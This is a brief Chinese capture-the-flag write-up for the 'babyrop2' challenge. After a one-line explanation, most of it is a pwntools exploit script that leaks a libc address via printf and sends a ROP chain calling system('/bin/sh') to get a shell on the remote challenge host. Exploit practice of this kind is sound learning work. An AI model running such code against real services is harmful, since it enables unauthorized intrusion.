这道题是用printf泄露已经调用过的函数确定libc文件然后用ROPgetshell(这里有格式化字符串,没有的话可以read一个然后在泄露反正够长)
exp:
#coding:utf-8
#name:doudou
from pwn import *
#p=process('./babyrop2')
p=remote('node3.buuoj.cn',28818)
elf=ELF('./babyrop2')
libc=ELF('/lib/x86_64-linux-gnu/libc.so.6')
def debug():
gdb.attach(p)
p.recvuntil('name? ')
pop_rdi=0x00400733
pop_rsi_r15=0x000400731
main_addr=0x400636
form_str=0x00400770
pd='a'*0x20+'aaaaaaaa'
#pd+=p64(pop_rdi)+p64(elf.got['printf'])+p64(elf.plt['printf'])+p64(0x0400636)
pd+=p64(pop_rdi)+p64(form_str)+p64(pop_rsi_r15)+p64(elf.got['read'])+p64(0)+p64(elf.plt['printf'])+p64(main_addr)
#gdb.attach(p,'b*0x04006CA')
p.sendline(pd)
read_addr=u64(p.recvuntil('\x7f')[-6:].ljust(8,'\x00'))
#libc=LibcSearcher('read',read_addr)
libcbase=read_addr-libc.symbols['read']
system_addr=libcbase+libc.symbols['system']
bin_sh=libcbase+libc.search('/bin/sh').next()
p.recvuntil('name? ')
pd='a'*0x28+p64(pop_rdi)+p64(bin_sh)+p64(system_addr)
p.sendline(pd)
p.interactive()
